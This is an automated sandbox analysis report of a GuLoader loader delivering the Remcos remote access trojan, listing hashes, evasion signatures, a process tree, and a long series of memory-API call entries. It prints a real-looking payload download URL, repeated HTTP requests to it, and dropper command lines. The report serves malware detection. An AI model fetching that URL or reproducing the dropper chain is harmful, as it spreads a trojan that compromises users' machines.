Analysis Report SecuriteInfo.com.Trojan.GenericKD.46442270.25635.17664

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.17664 (renamed file extension from 17664 to exe)
Analysis ID: 430707
MD5: 853744502b68e50e6cbaf81ffb3f5cc0
SHA1: ea748baebe70d7c6d3da9d1a2a34b76051425962
SHA256: 8115607710c35c78eda8dd16d73cab92e2c857d8c91eb1422fcc1b3f06835a4a
Tags: exe

Detection

GuLoader Remcos
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Sigma detected: WScript or CScript Dropper
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe (PID: 6696 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
    • SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe (PID: 7080 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
      • wscript.exe (PID: 6480 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • cmd.exe (PID: 6884 cmdline: 'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\win.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • win.exe (PID: 5128 cmdline: C:\Users\user\AppData\Roaming\win.exe MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
            • win.exe (PID: 2796 cmdline: C:\Users\user\AppData\Roaming\win.exe MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
    • backgroundTaskHost.exe (PID: 7080 cmdline: 'C:\Windows\system32\backgroundTaskHost.exe' -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca MD5: B7FC4A29431D4F795BBAB1FB182B759A)
  • win.exe (PID: 5844 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
    • win.exe (PID: 5604 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
  • win.exe (PID: 5852 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
    • win.exe (PID: 5544 cmdline: 'C:\Users\user\AppData\Roaming\win.exe' MD5: 853744502B68E50E6CBAF81FFB3F5CC0)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000004.00000000.383895844.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000012.00000002.644122683.00000000020B0000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000016.00000002.660151221.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
(5 of 7 entries shown)

Sigma Overview

System Summary:

Sigma detected: WScript or CScript Dropper
Source: Process started
Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community
Data:
  Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
  CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
  CommandLine|base64offset|contains:
  Image: C:\Windows\SysWOW64\wscript.exe
  NewProcessName: C:\Windows\SysWOW64\wscript.exe
  OriginalFileName: C:\Windows\SysWOW64\wscript.exe
  ParentCommandLine: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe'
  ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe
  ParentProcessId: 7080
  ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
  ProcessId: 6480

Signature Overview

            AV Detection:

Found malware configuration
Source: 00000000.00000002.384201388.00000000020B0000.00000040.00000001.sdmp, Malware Configuration Extractor: GuLoader {"Payload URL": "http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin"}
Yara detected Remcos RAT
Source: Yara match, File source: 00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: win.exe PID: 2796, type: MEMORY
Source: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

            Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin
Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: global traffic, HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: ztechinternational.com | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: ztechinternational.com | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: ztechinternational.com | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: ztechinternational.com | Cache-Control: no-cache
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 24_2_005698CB LoadLibraryA, InternetReadFile
Source: global traffic, HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: ztechinternational.com | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: ztechinternational.com | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: ztechinternational.com | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /dk/Jice_remcos%202_vOOXAzQx82.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: ztechinternational.com | Cache-Control: no-cache
Source: unknown, DNS traffic detected: queries for: ztechinternational.com
Source: win.exe, 00000016.00000002.660151221.0000000000560000.00000040.00000001.sdmp, win.exe, 00000018.00000002.679457919.0000000000560000.00000040.00000001.sdmp, String found in binary or memory: http://ztechinternational.com/dk/Jice_remcos%202_vOOXAzQx82.bin

            E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match, File source: 00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: win.exe PID: 2796, type: MEMORY

            System Summary:

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B9417 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B0CBA D3DKMTSetStablePowerState, NtWriteVirtualMemory, TerminateProcess
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B5CB3 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B98CB LoadLibraryA, NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B1D2E NtWriteVirtualMemory, LoadLibraryA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B9A03 NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B9A2F NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4A27 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4638 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B3E30 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B5230 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4E36 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B9A41 NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B5E47 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B9A57 NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B7E78 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4A73 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B9A74 NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B528D NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4A87 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4E99 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B9A95 NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4694 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B5EA8 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B9AAF NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4AA0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B46D3 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B1ED7 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B9AEC NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B2B01 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4B00 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4F14 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4B2D NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4B25 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B2F3E NtWriteVirtualMemory, LoadLibraryA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B9B4B NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4B5C NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4F8C NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B9B83 NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4797 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4FB8 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B8BBE NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4BB0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B9BCB NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B93CD NtProtectVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B47F4 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4C16 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B9C14 NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B5023 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4847 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4C68 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B506F NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4899 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B44CF NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B50C5 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B5CD9 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B98D8 NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B48E3 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4CE4 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B5CE4 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B60FA NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B28FE NtWriteVirtualMemory, LoadLibraryA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B98F3 NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4D2A NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B5D21 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4520 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B9933 NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4948 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B5146 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B995D NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B9951 NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B996E NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B5D71 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4570 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B518F NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4D83 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4985 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B999B NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B5D90 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B5DAD NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B45B5 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B51C7 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B4DE9 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B5DE9 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B99E9 NtResumeThread
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B45E0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B45E4 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B45F9 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe, Code function: 0_2_020B49F4 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B9417 NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B0CBA D3DKMTSetStablePowerState, NtWriteVirtualMemory, TerminateProcess
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B5CB3 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B98CB LoadLibraryA, NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B1D2E NtWriteVirtualMemory, LoadLibraryA
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B9A03 NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B9A2F NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4A27 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4638 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B3E30 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B5230 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4E36 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B9A41 NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B5E47 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B9A57 NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B7E78 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4A73 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B9A74 NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B528D NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4A87 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4E99 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B9A95 NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4694 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B5EA8 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B9AAF NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4AA0 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B46D3 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B1ED7 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B9AEC NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B2B01 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4B00 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4F14 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4B2D NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4B25 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B2F3E NtWriteVirtualMemory, LoadLibraryA
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B9B4B NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4B5C NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4F8C NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B9B83 NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4797 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4FB8 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B8BBE NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4BB0 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B9BCB NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B93CD NtProtectVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B47F4 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4C16 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B9C14 NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B5023 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4847 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4C68 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B506F NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4899 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B44CF NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B50C5 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B5CD9 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B98D8 NtUnmapViewOfSection
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B48E3 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B4CE4 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B5CE4 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B60FA NtWriteVirtualMemory
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B28FE NtWriteVirtualMemory, LoadLibraryA
Source: C:\Users\user\AppData\Roaming\win.exe, Code function: 16_2_020B98F3 NtUnmapViewOfSection
